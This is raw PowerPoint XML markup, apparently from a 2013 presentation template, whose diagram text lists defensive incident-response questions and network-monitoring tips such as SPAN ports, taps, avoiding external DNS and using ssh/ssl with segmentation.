            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Are formalized Incident Response policies in place and tested on annual basis?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C1B149AB-F270-47B3-89CD-D803D7B3A42C}" type="parTrans" cxnId="{47E1FF21-378C-47C0-BCF3-AE7559304DA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B3635AE-DEDE-44C3-837D-3B5A7901E6D0}" type="sibTrans" cxnId="{47E1FF21-378C-47C0-BCF3-AE7559304DA9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCDB92D0-FE16-4749-9C3F-EF61B9BE1ED9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Is internal staff properly trained?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AB02BF9-6FD0-419A-AA67-9233B6CE422F}" type="parTrans" cxnId="{D39DE055-CA55-417D-B020-ED8FC3084ECB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{96DECF45-2B04-4CDD-AA2C-FFB94638BCF9}" type="sibTrans" cxnId="{D39DE055-CA55-417D-B020-ED8FC3084ECB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C87CF62-2891-486B-A6B7-193673BC2139}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="sk-SK" sz="1700" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{38519557-0C8D-4CC3-87DB-AECD2CD262DC}" type="parTrans" cxnId="{8B43DED7-41AC-41AE-98FA-7E4E7E0149E1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B2CA6117-D5CD-43E4-A121-1CF8B1619473}" type="sibTrans" cxnId="{8B43DED7-41AC-41AE-98FA-7E4E7E0149E1}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6762ADE1-A815-4CE5-949C-940F85A132B1}" type="pres">
      <dgm:prSet presAssocID="{3281AB4D-2D6E-41D7-9903-38AF14F0A8F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F436DEF0-4354-4AAC-950B-4F6FBE4D5E0C}" type="pres">
      <dgm:prSet presAssocID="{F266B4CE-D06E-4467-A70A-DB76C3C0699F}" presName="circ1" presStyleLbl="vennNode1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A8B89732-5863-49F4-ACA7-09437C8FD0A6}" type="pres">
      <dgm:prSet presAssocID="{F266B4CE-D06E-4467-A70A-DB76C3C0699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9FB620C-BE80-45B0-A06E-858A5D99B467}" type="pres">
      <dgm:prSet presAssocID="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" presName="circ2" presStyleLbl="vennNode1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="sk-SK"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{01AB14C2-831B-495E-B730-6795AE85995B}" type="pres">
      <dgm:prSet presAssocID="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A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BE0D3F2E-81ED-4764-8FD7-C36FFA1946DB}" srcId="{F266B4CE-D06E-4467-A70A-DB76C3C0699F}" destId="{990ADC21-A5B5-4F86-A3F9-7322F759F92E}" srcOrd="0" destOrd="0" parTransId="{C4C67303-6D46-4374-B9E8-923F65926644}" sibTransId="{EFC784AC-B401-4CCB-BC01-0597FCA33FE4}"/>
    <dgm:cxn modelId="{2809DC51-EE8C-4621-897E-6F5A3D0A6AC5}" type="presOf" srcId="{990ADC21-A5B5-4F86-A3F9-7322F759F92E}" destId="{F436DEF0-4354-4AAC-950B-4F6FBE4D5E0C}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{8B43DED7-41AC-41AE-98FA-7E4E7E0149E1}" srcId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" destId="{1C87CF62-2891-486B-A6B7-193673BC2139}" srcOrd="4" destOrd="0" parTransId="{38519557-0C8D-4CC3-87DB-AECD2CD262DC}" sibTransId="{B2CA6117-D5CD-43E4-A121-1CF8B1619473}"/>
    <dgm:cxn modelId="{F845ABA1-155E-486A-A75C-9A7D56F530A6}" type="presOf" srcId="{E18B16E2-42CC-410B-B3AD-1E96AEF68197}" destId="{F436DEF0-4354-4AAC-950B-4F6FBE4D5E0C}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{DBAAD804-168B-497D-A938-C032756E7F4E}" type="presOf" srcId="{417C2C0C-E8DC-4B71-9587-8762E9A3708A}" destId="{49FB620C-BE80-45B0-A06E-858A5D99B467}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{A030484C-5483-4E04-BFDC-244DF15721E5}" type="presOf" srcId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" destId="{49FB620C-BE80-45B0-A06E-858A5D99B467}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{515AEEFE-86AC-4DAD-9804-26519FDCE6B1}" type="presOf" srcId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" destId="{01AB14C2-831B-495E-B730-6795AE85995B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{42A65BB8-8D04-47D4-B9C5-0B58F7C106B3}" srcId="{3281AB4D-2D6E-41D7-9903-38AF14F0A8F7}" destId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" srcOrd="1" destOrd="0" parTransId="{6E09C5D0-00C5-4019-B108-7D8C6D3A3F8C}" sibTransId="{93767537-0A2E-4356-97FD-352E7E35C5CF}"/>
    <dgm:cxn modelId="{4DDF223E-0427-4961-9A3C-A38E4728ED57}" type="presOf" srcId="{417C2C0C-E8DC-4B71-9587-8762E9A3708A}" destId="{01AB14C2-831B-495E-B730-6795AE85995B}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{672C4CA8-9932-4EF6-A76E-AEC81E5B2AC5}" type="presOf" srcId="{CCDB92D0-FE16-4749-9C3F-EF61B9BE1ED9}" destId="{49FB620C-BE80-45B0-A06E-858A5D99B467}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{5B161201-F129-4F10-90F9-D41619B2F268}" type="presOf" srcId="{E18B16E2-42CC-410B-B3AD-1E96AEF68197}" destId="{A8B89732-5863-49F4-ACA7-09437C8FD0A6}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{8E927194-0F53-420C-8889-2871FB2065B8}" srcId="{F266B4CE-D06E-4467-A70A-DB76C3C0699F}" destId="{E18B16E2-42CC-410B-B3AD-1E96AEF68197}" srcOrd="1" destOrd="0" parTransId="{9112A49E-B97F-4B5D-9723-86B941AC894F}" sibTransId="{39656514-B067-425E-B00A-D0741CC91074}"/>
    <dgm:cxn modelId="{7B2BB61F-2BA0-4444-AC96-5A06ECAEC7A3}" type="presOf" srcId="{1C87CF62-2891-486B-A6B7-193673BC2139}" destId="{49FB620C-BE80-45B0-A06E-858A5D99B467}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{730A96A6-B7B9-4692-977D-3774580DCE79}" type="presOf" srcId="{D1007118-B0F9-4B78-A816-4100C8771D6F}" destId="{49FB620C-BE80-45B0-A06E-858A5D99B467}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{E364163D-A168-4CE4-8BA5-DBA90381AC96}" type="presOf" srcId="{990ADC21-A5B5-4F86-A3F9-7322F759F92E}" destId="{A8B89732-5863-49F4-ACA7-09437C8FD0A6}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{44248B8D-3F65-465A-82DB-23F183559182}" type="presOf" srcId="{D1007118-B0F9-4B78-A816-4100C8771D6F}" destId="{01AB14C2-831B-495E-B730-6795AE85995B}" srcOrd="1" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{82DD73C2-4FCE-4A5D-8B9E-09F338E73334}" type="presOf" srcId="{EDA256BC-6CFC-416A-913C-ED7798C3A550}" destId="{01AB14C2-831B-495E-B730-6795AE85995B}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{50CA1DD6-67D1-4358-9D46-850484BD951A}" srcId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" destId="{EDA256BC-6CFC-416A-913C-ED7798C3A550}" srcOrd="0" destOrd="0" parTransId="{C709BE82-66D2-4A58-A49B-4758B51F07D3}" sibTransId="{844E724A-61A1-4C6E-B102-AF3AFA677794}"/>
    <dgm:cxn modelId="{47E1FF21-378C-47C0-BCF3-AE7559304DA9}" srcId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" destId="{D1007118-B0F9-4B78-A816-4100C8771D6F}" srcOrd="2" destOrd="0" parTransId="{C1B149AB-F270-47B3-89CD-D803D7B3A42C}" sibTransId="{0B3635AE-DEDE-44C3-837D-3B5A7901E6D0}"/>
    <dgm:cxn modelId="{D2A3F886-7818-487B-BB65-8EFC1330DD6F}" type="presOf" srcId="{3281AB4D-2D6E-41D7-9903-38AF14F0A8F7}" destId="{6762ADE1-A815-4CE5-949C-940F85A132B1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{FAF5EBBB-1429-4070-A8BA-107F67F506E6}" type="presOf" srcId="{1C87CF62-2891-486B-A6B7-193673BC2139}" destId="{01AB14C2-831B-495E-B730-6795AE85995B}" srcOrd="1" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{D9E2BD7A-E026-4847-A94A-A9224B007B83}" srcId="{3281AB4D-2D6E-41D7-9903-38AF14F0A8F7}" destId="{F266B4CE-D06E-4467-A70A-DB76C3C0699F}" srcOrd="0" destOrd="0" parTransId="{E9550CAA-A560-4E01-9DEC-4785FA3D8C59}" sibTransId="{7A3A5314-8498-434C-8353-4CAD30D34A9D}"/>
    <dgm:cxn modelId="{2E6DE31F-533D-4B60-8BF0-CB17EA35F2B5}" type="presOf" srcId="{CCDB92D0-FE16-4749-9C3F-EF61B9BE1ED9}" destId="{01AB14C2-831B-495E-B730-6795AE85995B}" srcOrd="1" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{4580014B-3971-4956-9630-A07F08FD6836}" type="presOf" srcId="{EDA256BC-6CFC-416A-913C-ED7798C3A550}" destId="{49FB620C-BE80-45B0-A06E-858A5D99B467}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{9F5585F2-5AFD-465E-ACBF-92C5B74929E3}" type="presOf" srcId="{F266B4CE-D06E-4467-A70A-DB76C3C0699F}" destId="{F436DEF0-4354-4AAC-950B-4F6FBE4D5E0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{2E5BAF2E-FE03-437B-99DE-7FC2585DF492}" type="presOf" srcId="{F266B4CE-D06E-4467-A70A-DB76C3C0699F}" destId="{A8B89732-5863-49F4-ACA7-09437C8FD0A6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{665C0B22-95B6-4D5A-AF80-ECC4E7FF8CD9}" srcId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" destId="{417C2C0C-E8DC-4B71-9587-8762E9A3708A}" srcOrd="1" destOrd="0" parTransId="{1ECECF6E-5704-41C5-BC13-3F1F6ED4E255}" sibTransId="{D5C15141-87E6-452B-99D9-159980DEA614}"/>
    <dgm:cxn modelId="{D39DE055-CA55-417D-B020-ED8FC3084ECB}" srcId="{6DA67BD9-AD0D-4F2C-829D-7027BACEA8A8}" destId="{CCDB92D0-FE16-4749-9C3F-EF61B9BE1ED9}" srcOrd="3" destOrd="0" parTransId="{0AB02BF9-6FD0-419A-AA67-9233B6CE422F}" sibTransId="{96DECF45-2B04-4CDD-AA2C-FFB94638BCF9}"/>
    <dgm:cxn modelId="{499E20E9-9D41-4F3A-AA5D-9AFAE4EC9CFB}" type="presParOf" srcId="{6762ADE1-A815-4CE5-949C-940F85A132B1}" destId="{F436DEF0-4354-4AAC-950B-4F6FBE4D5E0C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{2D8065A4-0D78-4ADB-8C11-19D81CF4C189}" type="presParOf" srcId="{6762ADE1-A815-4CE5-949C-940F85A132B1}" destId="{A8B89732-5863-49F4-ACA7-09437C8FD0A6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{FD291372-66CD-4987-ABC9-590FE5F71FC6}" type="presParOf" srcId="{6762ADE1-A815-4CE5-949C-940F85A132B1}" destId="{49FB620C-BE80-45B0-A06E-858A5D99B467}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/venn1"/>
    <dgm:cxn modelId="{8142ED9F-9CBB-432C-A803-DE9FFB9CD8CB}" type="presParOf" srcId="{6762ADE1-A815-4CE5-949C-940F85A132B1}" destId="{01AB14C2-831B-495E-B730-6795AE85995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F3D6D-99F0-4359-A71F-3B811DFBD67C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="35219"/>
          <a:ext cx="6858000" cy="866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SPAN port (Switched Port Analyzer) or mirror port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Can be part of SPAN local or remote VLAN</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="42322" y="77541"/>
        <a:ext cx="6773356" cy="782326"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29D20C21-130D-478D-A1C9-DE4A60DF3CFA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="956910"/>
          <a:ext cx="6858000" cy="866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Physical tape - TX and RX packets</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="42322" y="999232"/>
        <a:ext cx="6773356" cy="782326"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{352ECFB3-3B83-4EDD-93F9-68500E77D9F3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1878600"/>
          <a:ext cx="6858000" cy="866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Don't use external DNS resolution</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="42322" y="1920922"/>
        <a:ext cx="6773356" cy="782326"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EB51284D-52B6-40F0-AA07-1211003A6DBD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2745570"/>
          <a:ext cx="68580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742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sk-SK" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2745570"/>
        <a:ext cx="6858000" cy="314640"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3706E796-A31C-477B-B431-207A18305157}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2825749"/>
          <a:ext cx="6858000" cy="866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Secure Access: use ssh and ssl, segment network</a:t>
          </a:r>
          <a:endParaRPr lang="sk-SK" sz="1900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="42322" y="2868071"/>
        <a:ext cx="6773356" cy="7823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6DEF0-4354-4AAC-950B-4F6FBE4D5E0C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="217956" y="10570"/>
          <a:ext cx="3865059" cy="3865059"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4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 smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Establish relationships with vendors before incident</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial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"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Consider subscribing to Cyber Response or Data Breach program</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial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"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Review current layers of protection, and network topology</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="757671" y="466344"/>
        <a:ext cx="2228502" cy="2953512"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{49FB620C-BE80-45B0-A06E-858A5D99B467}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3003584" y="10570"/>
          <a:ext cx="3865059" cy="3865059"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:shade val="80000"/>
            <a:alpha val="50000"/>
            <a:hueOff val="-176558"/>
            <a:satOff val="-4365"/>
            <a:lumOff val="249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 smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Incident </a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Response Plan</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" b="1" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial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"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Can you recognize the incident?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial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"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Is evidence properly preserved?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial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"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Are formalized Incident Response policies in place and tested on annual basis?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial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"/>
              <a:cs typeface="Arial"/>
            </a:rPr>
            <a:t>Is internal staff properly trained?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial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k-SK" sz="1700" kern="1200" dirty="0">
            <a:latin typeface="Arial"/>
            <a:cs typeface="Arial"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4100425" y="466344"/>
        <a:ext cx="2228502" cy="2953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F191F-C7D8-44AE-ADE3-F1B985075E34}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/20/2013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B4922-E232-448E-834C-66E87B0BDB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07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AC708-165C-4B12-9F5D-A1AC911F2AE0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>11/20/2013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15A61-0425-4A1F-BCF5-96CB0F84E9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16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0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6464"/>
            <a:ext cx="7772400" cy="448841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="35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84814"/>
            <a:ext cx="64008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450703" y="4855464"/>
            <a:ext cx="2242602" cy="184666"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="12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Insert Confidentiality Notice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Master Title</a:t>
            </a:r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4857750"/>
            <a:ext cx="395941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B9AB1BC5-8244-4997-9202-6D7E7DEA20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928" y="925864"/>
            <a:ext cx="2971800" cy="677108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t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7328" y="932688"/>
            <a:ext cx="4800600" cy="369646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928" y="1733551"/>
            <a:ext cx="2971800" cy="28956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Master Title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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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+ 1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566928" y="1492792"/>
            <a:ext cx="3886200" cy="31363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Master Title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4857750"/>
            <a:ext cx="395941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en-US" dirty="0" smtClean="0"/>
              <a:t>Page </a:t>
            </a:r>
            <a:fld id="{B9AB1BC5-8244-4997-9202-6D7E7DEA20BF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800600" y="1518385"/>
            <a:ext cx="12954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4876800" y="1594900"/>
            <a:ext cx="1143000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="01627F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add Presenter Photo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254700" y="2003400"/>
            <a:ext cx="2051100" cy="838200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1200" b="1"/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0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1000" b="1" baseline="0"/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Company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+ 2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566928" y="1492792"/>
            <a:ext cx="3886200" cy="31363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Master Title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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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800600" y="1518385"/>
            <a:ext cx="12954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4876800" y="1594900"/>
            <a:ext cx="1143000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="01627F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add Presenter Photo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254700" y="2003400"/>
            <a:ext cx="2051100" cy="838200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1200" b="1"/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0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1000" b="1" baseline="0"/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Company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4800600" y="3118585"/>
            <a:ext cx="12954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 hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4876800" y="3195100"/>
            <a:ext cx="1143000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1200" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="01627F"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add Presenter Photo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6254700" y="3603600"/>
            <a:ext cx="2051100" cy="838200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1200" b="1"/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0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
